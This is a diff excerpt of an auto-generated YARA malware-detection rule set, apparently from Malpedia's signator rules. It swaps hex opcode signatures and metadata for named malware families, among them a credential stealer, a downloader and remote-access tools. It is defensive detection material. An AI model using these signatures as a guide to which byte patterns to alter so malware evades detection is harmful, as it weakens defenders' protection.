-		$sequence_7 = { 4883ec28 488d0da9feffff e8???????? 8905???????? 83f8ff 7425 488d156ad20600 }
-		$sequence_8 = { 48897c2420 440fb6c0 488bd7 488d4def e8???????? 488d4d0f }
-		$sequence_9 = { 0f86cf000000 4183ccff 418bcb 48c1e106 4c89741130 4439741124 0f86a7000000 }
+		$sequence_0 = { 8d8038154500 8945e4 803800 8bc8 7435 }
+		$sequence_1 = { 83e13f c1f806 6bc930 8b048540354500 80640828fe ff33 }
+		$sequence_2 = { 663b88b0924400 740d 83c002 83f814 72ef 33c0 40 }
+		$sequence_3 = { c745c007000000 8bf1 668945ac 8945d4 668945c4 8b450c 807e4800 }
+		$sequence_4 = { 57 e8???????? 83c414 8d4de4 837df810 8bf0 }
+		$sequence_5 = { c745f800000000 c645e800 83f810 720d }
+		$sequence_6 = { 59 83f80a 7336 8b4d88 83f924 7d0f 8a809c384400 }
+		$sequence_7 = { 8b049540354500 c644012801 8b049540354500 897c0118 8bfe e9???????? }
+		$sequence_8 = { eb55 8b1c9dcc614400 56 6800080000 6a00 }
+		$sequence_9 = { 83e03f c1f906 6bf030 03348d40354500 837e18ff 740c 837e18fe }
 
 	condition:
-		7 of them and filesize < 1265664
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_5T_Downloader_Auto : FILE
+rule MALPEDIA_Win_M0Yv_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5362fc02-7c1d-5a3b-a300-446438d04597"
+		id = "8b6ddfd9-e72e-5c1f-8455-077da1ba000c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.5t_downloader_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.m0yv_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "89d6b68b4695f52c4102e727ccfceba9dea8c1d372d4dac3b5353663c79c51c0"
+		logic_hash = "7fb594619e0043ac0fe0e642705f4afbb65953751fccf49008dc2c100af6a96a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85990,32 +86244,32 @@ rule MALPEDIA_Win_5T_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 8b4508 85c0 7416 83781400 7510 }
-		$sequence_1 = { 85c9 7409 83781800 7403 5d ffe1 }
-		$sequence_2 = { 8b4508 85c0 7416 83781400 7510 }
-		$sequence_3 = { 8b4508 85c0 7416 83781400 }
-		$sequence_4 = { 7403 5d ffe1 83c8ff }
-		$sequence_5 = { 83781800 7403 5d ffe1 83c8ff }
-		$sequence_6 = { 85c0 7416 83781400 7510 }
-		$sequence_7 = { 85c9 7409 83781800 7403 5d }
-		$sequence_8 = { 83781800 7403 5d ffe1 }
-		$sequence_9 = { 7409 83781800 7403 5d }
+		$sequence_0 = { 4803ac24c0000000 48896c2458 4c8b5c2418 4b8d0c1b 48890c24 480fafc1 488d3cc0 }
+		$sequence_1 = { f6c104 7476 410fb6c2 420fb6441803 448bc0 8bd0 }
+		$sequence_2 = { 48897820 4156 4883ec20 8a99a6000000 4032f6 4032ff 4032ed }
+		$sequence_3 = { 4869fa53c6f0ff 4801f8 4869ed132c0a00 488bbc24c0000000 4c8d3c2f 4801fd 4881c500001000 }
+		$sequence_4 = { 4889f2 4989d8 e8???????? 488d8c2480000000 e8???????? 488dbc2410010000 }
+		$sequence_5 = { 48c1fb15 4c01f3 4989de 49c1fe15 4d01e6 4d89f0 49c1f815 }
+		$sequence_6 = { 480faf4c2448 4801cd 4803ac24c0000000 48896c2458 4c8b5c2418 }
+		$sequence_7 = { 488b942490000000 4c8d3c02 4801d0 480500001000 4989c6 48250000e0ff 4929c7 }
+		$sequence_8 = { 31c3 8b4118 89442410 8b7218 8974243c 31c6 8b411c }
+		$sequence_9 = { 8b7c2404 4431d7 897904 8b7c2408 4431df 897908 8b7c241c }
 
 	condition:
-		7 of them and filesize < 539648
+		7 of them and filesize < 779264
 }
-rule MALPEDIA_Win_Freenki_Auto : FILE
+rule MALPEDIA_Win_Compfun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90a961ff-4b9f-5590-858d-04fe0571f818"
+		id = "3d58a754-0068-5ddf-8df3-41773f9f7343"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.freenki_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.compfun_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "2dca0dd103141182e01ae8912e5d010c4bde1802bf1b8f905ac7a8ec2594845a"
+		logic_hash = "f91830d32accaa1a970b31fd97ff26cbec286fc3877ecca166a49e3ceef0861e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86029,33 +86283,39 @@ rule MALPEDIA_Win_Freenki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e03f 6bc830 8b049578394200 c644082801 897de4 c745fcfeffffff }
-		$sequence_1 = { 83c404 8d8570feffff 50 8d8570fdffff }
-		$sequence_2 = { 56 e8???????? 8bf8 83c408 85ff 7598 8b4dfc }
-		$sequence_3 = { 68???????? 50 ff5110 8b55b8 8b4dcc 2bd1 0f1f440000 }
-		$sequence_4 = { 6a00 6a03 6a00 6a00 57 8d85f8ceffff 50 }
-		$sequence_5 = { 0f1005???????? 6a00 57 0f11044f f30f7e05???????? 660fd6444f10 a1???????? }
-		$sequence_6 = { 83c404 85db 747c 53 56 6a00 }
-		$sequence_7 = { 8b8560ffffff 83c404 8b08 50 }
-		$sequence_8 = { 85db 747c 53 56 }
-		$sequence_9 = { 8bd7 c1fa06 8bc7 83e03f 6bc830 8b049578394200 f644082801 }
+		$sequence_0 = { 742d 53 8d85d8fdffff 50 a1???????? }
+		$sequence_1 = { c70642434445 c7460430333935 c746082d453532 c7460c462d3436 }
+		$sequence_2 = { c746086f6c6865 c7460c6c703332 c74610536e6170 c7461473686f74 c6461800 }
+		$sequence_3 = { 85c0 0f848b000000 68???????? e8???????? 59 50 }
+		$sequence_4 = { c6460600 8bc6 5e 5d }
+		$sequence_5 = { 50 57 ffd3 894604 85c0 7433 68???????? }
+		$sequence_6 = { c7460465744d6f c7460864756c65 c7460c46696c65 c746104e616d65 c6461700 }
+		$sequence_7 = { c70647657456 c7460465727369 c746086f6e4578 c6460d00 8bc6 }
+		$sequence_8 = { 034c2460 488b442450 894820 488b4c2450 }
+		$sequence_9 = { 0344242c 8bc8 e8???????? 4889442448 }
+		$sequence_10 = { 03c1 89442420 8b442420 83c001 }
+		$sequence_11 = { 03c1 89442434 8b442430 39442434 }
+		$sequence_12 = { 03c1 4863d0 488b4c2430 488b442438 }
+		$sequence_13 = { 03c1 89442420 8b4c2438 488b442450 }
+		$sequence_14 = { 03c1 89442420 8b542438 486bd218 }
+		$sequence_15 = { 034c242c 488b442470 894820 488d542440 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Elf_Bashlite_Auto : FILE
+rule MALPEDIA_Win_Wndtest_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4d68ff86-b62a-56f4-900d-a8e2f982b0ab"
+		id = "4e765db5-5f4c-5512-83db-9314a470b113"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.bashlite_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wndtest_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "46d8bef4c939db6a89af35372d5c8a74e31ae90669b6477bbd5c0d09039a9b9b"
-		score = 75
+		logic_hash = "6715ba88802d5ba703391f2c7044c94873e31517f5f99099b0c4158e2dd1a5c1"
+		score = 50
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -86068,32 +86328,32 @@ rule MALPEDIA_Elf_Bashlite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0a c785ecefffff00000000 8b85ecefffff c9 c3 55 }
-		$sequence_1 = { f7d0 21d0 3345fc c9 c3 55 }
-		$sequence_2 = { 89c2 89d0 c1e81f 01d0 d1f8 }
-		$sequence_3 = { eb0a c785ecefffff00000000 8b85ecefffff c9 }
-		$sequence_4 = { e8???????? 8945ec 837dec00 750b 8b45ec }
-		$sequence_5 = { 85c0 750c c785ecefffff01000000 eb0a }
-		$sequence_6 = { eb0d e8???????? c70061000000 31d2 }
-		$sequence_7 = { 760f e8???????? c7001c000000 31c0 }
-		$sequence_8 = { 750c c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 c3 }
-		$sequence_9 = { c785ecefffff01000000 eb0a c785ecefffff00000000 8b85ecefffff c9 }
+		$sequence_0 = { 56 0fbe7001 33750c 57 8d4e01 51 }
+		$sequence_1 = { 8b0d???????? 53 56 0fbe7001 }
+		$sequence_2 = { 8bf0 56 6803000010 57 ffd3 85c0 741c }
+		$sequence_3 = { ff15???????? 8b3d???????? 85ff 7444 8bcb 8bc7 }
+		$sequence_4 = { 6a01 6a00 6a07 6a00 ff15???????? 8d7eff }
+		$sequence_5 = { 8d4e01 51 e8???????? 83c404 33c9 }
+		$sequence_6 = { ffd7 8b15???????? a3???????? a1???????? 52 50 e8???????? }
+		$sequence_7 = { ffd7 8d55e0 52 ffd3 6a00 }
+		$sequence_8 = { 83c410 56 53 ffd7 50 }
+		$sequence_9 = { 75ea 8bcb 0fb6d2 c1e918 33ca }
 
 	condition:
-		7 of them and filesize < 2310144
+		7 of them and filesize < 901120
 }
-rule MALPEDIA_Win_Shadowhammer_Auto : FILE
+rule MALPEDIA_Win_Unidentified_098_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b57d4c23-f9b4-522a-89ba-c4ac79dc31ec"
+		id = "77dc1ff9-dd3d-5bc9-85b5-203dd4f53718"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shadowhammer_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_098_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9c0187702056fafb079efbd5dab5b93b10eb6c78f6f641de1a14fc5c3fa972f5"
+		logic_hash = "0219ee65046a1130cad6fddadbb5a6a530711c105dcd628abbc82d2c03f62f83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86107,34 +86367,34 @@ rule MALPEDIA_Win_Shadowhammer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945fc ff5624 83c40c 53 }
-		$sequence_1 = { 6a08 57 ff741da4 ff16 8945f0 }
-		$sequence_2 = { 8dbd01feffff ab ab ab ab }
-		$sequence_3 = { c78534ffffffdfa04cab c78538ffffff1a0dccc9 c7853cffffffc9d42289 c78540ffffff30bc1403 c78544ffffff1212cb9a c78548ffffff7c1bb287 }
-		$sequence_4 = { 50 53 ff5608 3bc3 745f 48 8945f8 }
-		$sequence_5 = { 6a06 8d472c 50 8d4588 }
-		$sequence_6 = { 33c0 8dbd04ffffff ab 889d08ffffff 8dbd09ffffff ab ab }
-		$sequence_7 = { 6800804000 ff15???????? 833d????????00 7508 6a01 e8???????? }
-		$sequence_8 = { 47 83c614 3b7d14 72e3 }
-		$sequence_9 = { 8955a0 c745a409da9df3 c745a8a050afad c745ac0df0ef96 c745b03b41b6e2 33c0 8d7db4 }
+		$sequence_0 = { e9???????? 488b01 88542428 ff5048 0fb6542428 89c1 e9???????? }
+		$sequence_1 = { 83eb10 6644894104 83fb0f 7fcd bbf0ffffff 29d3 89d8 }
+		$sequence_2 = { 837c2448ff 0f94c0 4885c9 410f95c5 4120c5 0f8511010000 38c3 }
+		$sequence_3 = { ff5048 8b542440 89c5 e9???????? 4488bc248c000000 488bbc2498000000 4531ff }
+		$sequence_4 = { 85c0 0f8549ffffff 488d4360 4883c420 5b 5e 5f }
+		$sequence_5 = { f30f6f9c2430010000 0f11a3d9010000 0f11abe9010000 0f1183f9010000 0f118b09020000 0f119319020000 0f119b29020000 }
+		$sequence_6 = { ff5060 4c8b55b8 4839c3 7570 498b4500 4d89f0 4c89d2 }
+		$sequence_7 = { 4c894930 4c39c2 7c22 4c8d8c10ffffff7f 0f1f840000000000 4c89c8 4829d0 }
+		$sequence_8 = { e8???????? 4d8b37 e9???????? 410fb74654 4183c001 4883ea02 668902 }
+		$sequence_9 = { bd01000000 e9???????? 4889c1 e8???????? 498b06 4c89f1 ff5008 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 3345408
 }
-rule MALPEDIA_Win_Parallax_Auto : FILE
+rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f999aded-327c-50dd-9dd2-6822fe568c2e"
+		id = "2de3c422-45bc-58ea-9b58-c5be8e18f59a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.parallax_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kleptoparasite_stealer_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "598728667b89c1a79c35abfecdd8c0a41fda3612c3bf2021240a756e9bc3373e"
-		score = 75
-		quality = 75
+		logic_hash = "7be717d94b9f90fe9083718b4b3c9a144ee692fe8b9cfc6de9546fc76b8ff287"
+		score = 60
+		quality = 35
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86146,32 +86406,32 @@ rule MALPEDIA_Win_Parallax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837e3000 740c 8b5630 8d424c 50 e8???????? e9???????? }
-		$sequence_1 = { 6a00 ff35???????? ff5260 837f3400 7413 }
-		$sequence_2 = { 56 ff7508 e8???????? eb5e 3de9030000 7557 }
-		$sequence_3 = { 50 8d45f8 50 ff75fc ff96a4000000 85c0 0f850a010000 }
-		$sequence_4 = { e8???????? 96 5f 5e 5d c20400 55 }
-		$sequence_5 = { c7474000200000 eb18 ff7640 8f45fc 8b35???????? 8b55fc }
-		$sequence_6 = { 3b35???????? 72d0 58 8b1d???????? 6bdb04 03c3 8b7d0c }
-		$sequence_7 = { 7530 6a01 68ff1f0000 e8???????? }
-		$sequence_8 = { 8975e4 8d55f0 8b0e 890a }
-		$sequence_9 = { c7421c00000000 6a06 ff750c e8???????? }
+		$sequence_0 = { 7405 8901 895104 8be5 5d c3 3b0d???????? }
+		$sequence_1 = { 8901 895104 8be5 5d c3 3b0d???????? 7502 }
+		$sequence_2 = { cc 55 8bec 56 e8???????? 8b7508 6a02 }
+		$sequence_3 = { cc 55 8bec 56 e8???????? 8b7508 }
+		$sequence_4 = { 895104 8be5 5d c3 3b0d???????? 7502 f3c3 }
+		$sequence_5 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 }
+		$sequence_6 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? }
+		$sequence_7 = { 895104 8be5 5d c3 3b0d???????? }
+		$sequence_8 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 }
+		$sequence_9 = { 8901 895104 8be5 5d c3 3b0d???????? }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 3006464
 }
-rule MALPEDIA_Win_Httpdropper_Auto : FILE
+rule MALPEDIA_Win_Bohmini_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe74c397-b0b6-56ba-ab68-0472f7992b43"
+		id = "c8923e09-0cd1-5865-924f-18639308d13e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpdropper_auto.yar#L1-L157"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bohmini_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "1f304e411e6e19a3397e572e7a13609bae133af12f0a3672cddde2eef3a5cdf3"
+		logic_hash = "d63dab417a618811791980b051ba5149b8c4dca6bd7568c5aa5894be2ba1d4b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86185,38 +86445,32 @@ rule MALPEDIA_Win_Httpdropper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff15???????? 85c0 0f85b9000000 68ff030000 }
-		$sequence_1 = { b803010000 899580f0ffff 8b95c0f0ffff 898568f0ffff 898584f0ffff }
-		$sequence_2 = { 7435 b9???????? e8???????? 8bd0 90 }
-		$sequence_3 = { 746f 803d????????00 b9???????? 7419 }
-		$sequence_4 = { 83ffff 7516 5f 5b }
-		$sequence_5 = { e8???????? 8be5 5d c3 8d85ecfdffff 8d5001 }
-		$sequence_6 = { c60000 40 2bd0 8d7432fb }
-		$sequence_7 = { 8bce c1f905 8b0c8d60aa0310 83e61f }
-		$sequence_8 = { 4883ec38 48c7442420feffffff 4c8d05740e0200 488d15350c0200 488d0dca9a0200 }
-		$sequence_9 = { 33c0 488bda 41b900100000 f2ae 33d2 }
-		$sequence_10 = { 33c0 488bd9 c644242800 8d7010 }
-		$sequence_11 = { 41c1e208 0fb6c1 4403d0 418bd0 c1ea18 }
-		$sequence_12 = { e8???????? 488b8b58400000 4885c9 7405 }
-		$sequence_13 = { 85c0 74a3 488bcf e8???????? 448b45e0 }
-		$sequence_14 = { e8???????? 448be8 8bf0 6666660f1f840000000000 }
-		$sequence_15 = { 448b442440 41ffc0 33d2 488bc8 e8???????? 41b801000000 }
+		$sequence_0 = { 85c0 751e 8b4610 85c0 7403 50 ffd3 }
+		$sequence_1 = { 6a01 ffd5 5f 5e 5d 5b }
+		$sequence_2 = { 57 ff15???????? 8b742414 57 56 e8???????? 83c408 }
+		$sequence_3 = { 3db7000000 7504 895c240c 8b15???????? }
+		$sequence_4 = { ff15???????? 83f801 7562 8d4c2418 51 e8???????? }
+		$sequence_5 = { 8b4c2404 85c0 7408 8bc8 8b00 }
+		$sequence_6 = { 50 6819000200 66a5 8d4c2420 55 bf04010000 51 }
+		$sequence_7 = { 688b130000 ff15???????? 8b7c2410 e9???????? 53 56 55 }
+		$sequence_8 = { 6a00 50 8b84244c010000 50 e8???????? }
+		$sequence_9 = { 8b8c2458020000 8d54244c 51 52 e8???????? 83c408 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Tapaoux_Auto : FILE
+rule MALPEDIA_Win_Pteranodon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bce56a96-656f-5b7c-a7ef-d9facfa97150"
+		id = "80ff2986-5474-5ad7-b810-831fbf1d4342"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tapaoux_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pteranodon_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "6c80ff6e5416b0acf89a64b88900eb504acb14643be57ceb13e02da18a2fedde"
+		logic_hash = "cb9eee2c2b40d73ca9d2882bf4c44ed595c9eb29005a317bb6423459f15ea4d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86230,32 +86484,38 @@ rule MALPEDIA_Win_Tapaoux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8a06 51 50 4e e8???????? 83c408 }
-		$sequence_1 = { e8???????? 8bd0 83c404 85d2 7503 c21400 53 }
-		$sequence_2 = { 6a04 8d8c241c040000 68???????? 51 e8???????? 83c40c 85c0 }
-		$sequence_3 = { 8bfb 8bf1 55 c1e902 f3ab }
-		$sequence_4 = { e8???????? 8bc5 5d 5f 5e 81c40c080000 c3 }
-		$sequence_5 = { 81ec1c020000 53 56 8bb42428020000 57 85f6 0f8410010000 }
-		$sequence_6 = { 81ec44040000 55 57 b91f000000 33c0 8d7c2409 c644240800 }
-		$sequence_7 = { b91f000000 33c0 8dbc2491000000 889c2490000000 885c2410 f3ab }
-		$sequence_8 = { 8d8424b4000000 83e103 6a01 f3a4 50 8d4c241c e8???????? }
-		$sequence_9 = { 74c5 3bf7 7ccf 5f 5e 5d }
+		$sequence_0 = { 8d0dc02b4300 ba1b000000 e9???????? a900000080 7517 ebd4 a9ffff0f00 }
+		$sequence_1 = { 56 8b0485b8690310 33db 8b7508 57 }
+		$sequence_2 = { c1e002 50 8b85a4f8ffff 0fb70485fcef0210 8d0485f8e60210 50 }
+		$sequence_3 = { 8d75c0 8d0417 0f4375c0 8945d0 8d0416 }
+		$sequence_4 = { 50 46 e8???????? 83c40c 8d85c8faffff }
+		$sequence_5 = { 50 c745dc9c090310 e8???????? 8b75ec 8bce 8935???????? }
+		$sequence_6 = { ff15???????? 6a00 56 6a00 ff15???????? 6a00 ffb588dbffff }
+		$sequence_7 = { e8???????? 8bb55cfeffff 83c418 03d8 13fa eb0c 039d88feffff }
+		$sequence_8 = { 83e03f 6bc838 8b0495e0874300 8b440818 83f8ff }
+		$sequence_9 = { 8bd8 e8???????? 8bf8 c645fc01 b883de1b43 }
+		$sequence_10 = { 56 57 8d3c85d8844300 8b07 83ceff 3bc6 }
+		$sequence_11 = { 7213 40 8d8df0f8ffff 50 ffb5f0f8ffff e8???????? }
+		$sequence_12 = { e8???????? 83c404 8b45b8 33db }
+		$sequence_13 = { 8b55f0 897734 83c714 c74304???????? 8d7028 c6434c00 }
+		$sequence_14 = { 8bb590dbffff 56 50 8b8584dbffff 83c004 50 }
+		$sequence_15 = { f6c201 742b 8d55e8 2bd6 881c32 8d7601 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Nightclub_Auto : FILE
+rule MALPEDIA_Win_Diztakun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "16a1e3cd-d9e1-5de2-a066-97eb2bedde4e"
+		id = "b37620d3-10d5-5e3b-870d-9fcc520704b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightclub_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diztakun_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "c6e72bd1072251138d02bae0378aff5596a4fe234144ae53f2fd722485213a6d"
+		logic_hash = "a3712f3787a19a9586caeb79806d7a5b14b9c57af185546c9c7b23f90c084141"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86269,32 +86529,32 @@ rule MALPEDIA_Win_Nightclub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8b7508 8b06 8b5020 57 8bf9 8b1f }
-		$sequence_1 = { e8???????? 85c0 0f854e150000 8b8fb0000000 8d8557fcffff 50 51 }
-		$sequence_2 = { 3bd7 0f83f7000000 8b5104 85d2 740a 8bc8 2bca }
-		$sequence_3 = { ff15???????? 8b95ccfbffff 52 ffd3 8b85d0fbffff 50 ffd3 }
-		$sequence_4 = { 890a 8b10 8b4804 50 894a04 ffd7 8b450c }
-		$sequence_5 = { 50 8d4de0 51 e8???????? 8b55e4 52 ffd7 }
-		$sequence_6 = { 3b410c 7206 33c0 5d c20400 c6410401 8b4908 }
-		$sequence_7 = { 7415 8bff 85c0 7409 8b5510 668b12 668910 }
-		$sequence_8 = { 8d45f3 33f6 8975fc 50 8975e0 68???????? 8d4dcc }
-		$sequence_9 = { 72e6 b892010000 5f 5e 8b4df8 33cd e8???????? }
+		$sequence_0 = { 50 8b01 ffd0 8b442404 }
+		$sequence_1 = { 89842410020000 57 a1???????? 33c4 50 8d84241c020000 64a300000000 }
+		$sequence_2 = { 7469 85ff 7465 8b442440 85c0 }
+		$sequence_3 = { 8b7710 8b04b5a4914400 53 6a04 ff75f0 99 ff75ec }
+		$sequence_4 = { 8b4de0 8d0c8d60d74400 8901 8305????????20 8d9000080000 }
+		$sequence_5 = { 8b2d???????? 52 ffd5 85db 7435 8d442414 50 }
+		$sequence_6 = { 51 8d542420 52 50 50 50 50 }
+		$sequence_7 = { b8???????? a3???????? c705????????4fd34200 c705????????03d34200 }
+		$sequence_8 = { 8bcc 8964241c 50 e8???????? 51 8bcc 89642434 }
+		$sequence_9 = { 8b1f 6a00 8dafa8000000 6a03 c7450000000000 e8???????? 8b5354 }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Chaperone_Auto : FILE
+rule MALPEDIA_Win_Mm_Core_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a1a2e24-f819-52e0-8b1d-cbec80d9780c"
+		id = "bf93218a-8d8c-58ea-bf30-76f3ba39addc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chaperone_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mm_core_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "fb6f1141a2ad1ef091e8554a5e8c7b2e545fcb51cdc5087174343f9767f17bba"
+		logic_hash = "29ec3357b82a9f4eff6706385f45e4b797a4fc7c02bf49f9f64641ab1015abf0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86308,34 +86568,34 @@ rule MALPEDIA_Win_Chaperone_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c2458 488b442448 4803c1 4889442448 c644247833 c6442479c0 }
-		$sequence_1 = { b924000000 f3a4 488d4c2438 e8???????? 488d542438 488d4c2460 }
-		$sequence_2 = { 83c001 8944243c 8b442438 3944243c 0f8345010000 8b44243c 8b4c8440 }
-		$sequence_3 = { e8???????? 4889442428 488d7c2438 488d3547af0000 b924000000 f3a4 }
-		$sequence_4 = { e8???????? 41b801000000 488d542430 488b4c2468 }
-		$sequence_5 = { c78424c80100000b000000 488d542468 488b8c2480030000 ff15???????? 488905???????? }
-		$sequence_6 = { 85c0 740d 488b4c2420 0fb7442440 668901 488b4c2430 e8???????? }
-		$sequence_7 = { 33c0 eb68 c744243801000000 488b442430 }
-		$sequence_8 = { 33db 488bf8 48391d???????? 0f85d0000000 488d0d4fb50000 ff15???????? 488bf0 }
-		$sequence_9 = { c3 48895c2408 57 4883ec20 488d1da3940100 bf0a000000 }
+		$sequence_0 = { 68???????? 57 89442430 ffd6 68???????? 57 89442434 }
